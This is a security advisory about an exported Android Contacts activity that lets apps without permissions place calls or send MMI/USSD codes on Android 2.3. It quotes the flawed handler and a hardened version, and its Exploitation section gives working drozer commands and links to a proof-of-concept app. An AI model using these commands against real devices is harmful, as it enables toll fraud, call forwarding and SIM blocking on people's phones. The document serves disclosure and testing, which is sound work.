CVE-2014-N/A com.android.contacts

Date: 2014-07-04 11:46:39

Introduction

This bug is similar to CVE-2013-6272 but is only exploitable on older Android versions. The bug exists in the component com.android.contacts.

Credits

Authors: Marco Lux, Pedro Umbelino
Email: security@curesec.com

Affected Versions:

Version   SDK   Affected
2.3.3     10    Vulnerable
2.3.6     10    Vulnerable
3.0       11    Not Vulnerable
3.2       13    Not Vulnerable
4.0       14    Not Vulnerable
4.0.3     15    Not Vulnerable

This bug is not related to CVE-2013-6272 but has the same result. Reading the source code, it probably exists at least since version 1.5. However, we have only tested with SDK 10.

The bug was corrected in version 3.0, SDK 11. Still, we would be interested in feedback from people testing the supplied exploitation techniques on their test devices.

The bug is located in src/com/android/contacts/ContactsListActivity.java. Like in CVE-2013-6272, this activity is exported when it probably should not be.

When this activity is created, it parses the Intent with which it has been started:

    ...
    } else if (Intents.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED.equals(action)) {
        // the tel: URI is taken straight from the caller's Intent, with no check on who sent it
        Intent newIntent = new Intent(Intent.ACTION_CALL_PRIVILEGED, intent.getData());
        startActivity(newIntent);
        finish();
        return;
    }
    ...

This basically means we can fool the activity into thinking we clicked on the dial number of a search suggestion and make it call any number we want, since the number comes from intent.getData(). This also works for MMI and USSD codes (those that would normally require the user to press the SEND button after the code; Android secret codes do not work, nor does *#06# to show the IMEI, for example).

In conclusion, this bug can be exploited like CVE-2013-6272, but it lives in a different codebase.
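As an added illustration of how the quoted handler could be hardened (this is example code written for this page, not AOSP code and not the upstream fix that shipped in 3.0), the version below drops the caller-supplied URI into a plain ACTION_DIAL instead of ACTION_CALL_PRIVILEGED and validates the number first. The class name HardenedContactsListActivity, the helper names and the digit-length bounds in the regular expression are assumptions made for the example.

```java
// Added example: a hardened form of the intent handler quoted above.
// Not the original AOSP code; names and bounds are assumptions.
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.provider.Contacts.Intents;

public class HardenedContactsListActivity extends Activity {

    private static final String TEL_SCHEME = "tel";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        String action = intent.getAction();
        if (Intents.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED.equals(action)) {
            handleSearchSuggestionDial(intent.getData());
            finish();
        }
    }

    /**
     * Accept only a tel: URI made of an optional '+' and 3 to 15 digits.
     * Anything containing '*' or '#' (MMI/USSD codes) is rejected, which is
     * exactly the class of input the original bug let reach telephony with
     * no user interaction. The length bounds are an assumption for the example.
     */
    static boolean isPlainPhoneNumber(Uri data) {
        if (data == null || !TEL_SCHEME.equals(data.getScheme())) {
            return false;
        }
        String number = data.getSchemeSpecificPart();
        return number != null && number.matches("\\+?[0-9]{3,15}");
    }

    private void handleSearchSuggestionDial(Uri data) {
        if (!isPlainPhoneNumber(data)) {
            // Silently drop malformed or non-numeric targets.
            return;
        }
        // ACTION_DIAL only pre-fills the dialer; the user must still press
        // SEND. It needs no permission and cannot place a call by itself,
        // unlike the ACTION_CALL_PRIVILEGED used in the vulnerable code.
        Intent dial = new Intent(Intent.ACTION_DIAL, data);
        startActivity(dial);
    }
}
```

The two changes address the two halves of the problem separately: the URI check stops MMI/USSD strings from being treated as a number at all, and switching to ACTION_DIAL means that even a well-formed number still needs the user's confirmation, so an exported entry point no longer turns into a free phone call. Where an activity has no reason to receive this intent from other packages, declaring it with android:exported="false" in the manifest removes the entry point entirely.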

Exploitation

For the audience to play with, test and trigger the vulnerability, we provide the following tools:

CRT-Kolme

You can download “Curesec Research Team – Kolme (Callmeh)” at

https://curesec.com/data/CRT-Kolme.apk

Source Code: https://curesec.com/data/CRT-Kolme.7z

After installation, just click on the Curesec logo and the test screen will appear:


Choose the SDK you want to test. If your phone is vulnerable, it will call the number 31337:


Exploits for drozer

    # unpack exploits to drozer modules directory
    tar xjf dz_exploits.tar.bz2 -C drozer/modules

    # forward tcp and connect to drozer
    adb forward tcp:31415 tcp:31415
    drozer console connect

    # this conducts a phone call to the specified number
    dz> run curesec.exploit.callme2 -t

    # send code to the device, for instance
    dz> run curesec.exploit.callme2 -c


Drozer Commandline Foo

Call any number:

    # Call any number!
    run app.activity.start --component com.android.contacts com.android.contacts.ContactsListActivity --action android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED --data-uri tel:31337

In order to make the codes work, you can use the following command:

    run app.activity.start --component com.android.contacts com.android.contacts.ContactsListActivity --action android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED --data-uri tel:%2343%23

The usual # symbol in MMI codes has to be URL-encoded as %23 for the command to work properly.

FAQ

1. Why is this a bug?

Android normally requires a permission to be granted before an application can perform such actions. If your installed application does not hold the right to place a phone call, the Android OS should throw a permission denied error.

However, this bug circumvents that check and allows any malicious app to place a phone call, send MMI or USSD codes, or hang up an ongoing call.

2. Is there an app to test this issue on my phone?

You can use the APK we published. You will find details in the next sections.

3. How would an attacker abuse this?

This bug can be abused by a malicious application. Take a simple game that ships with this code. The game won't ask you for extra permissions to place a phone call to a toll number, yet it is able to do so.

This is normally not possible without granting the app this special permission. Not only might it be disturbing or expensive for someone to have a toll number called or ongoing calls hung up; it is also possible to send USSD or MMI codes.

The list of USSD/MMI codes is long, and there are several quite powerful ones, such as changing the flow of phone calls (forwarding), blocking your SIM card, enabling or disabling caller anonymisation, and so on.

Please note that curesec GmbH is not responsible for any damage your device might suffer while you try to execute such codes.

4. Are tools which revoke permissions from apps blocking this attack?

No. As the app does not hold the permission but is abusing a bug, such tools cannot easily protect you from this without knowing that this bug exists in another class on the system.

5. How can I contact you?

security@curesec.com

Timeline

Date        Comment                                                                  Sender
10/24/2013  Initial Report of CVE-2013-6272 by Curesec                               Curesec
10/24/2013  Forwarded to the dedicated Team by Google                                Google
11/11/2013  Engineers working on the issue                                           Google
17/01/2014  Engineers still working on the issue                                     Google
23/01/2014  Issue is reported to be patched and integrated in the next two weeks.    Google
6/5/2014    Request if the issue is resolved now. No response yet.                   Curesec
4/7/2014    Public Disclosure of CVE-2013-6272 and CVE-2014-N/A                      Curesec

Downloads

CRT-Kolme.apk (test application)
CRT-Kolme.7z (source code)
dz_exploit (exploit archive cve-2013-6271, cve-2013-6272 and cve-2014-n/a)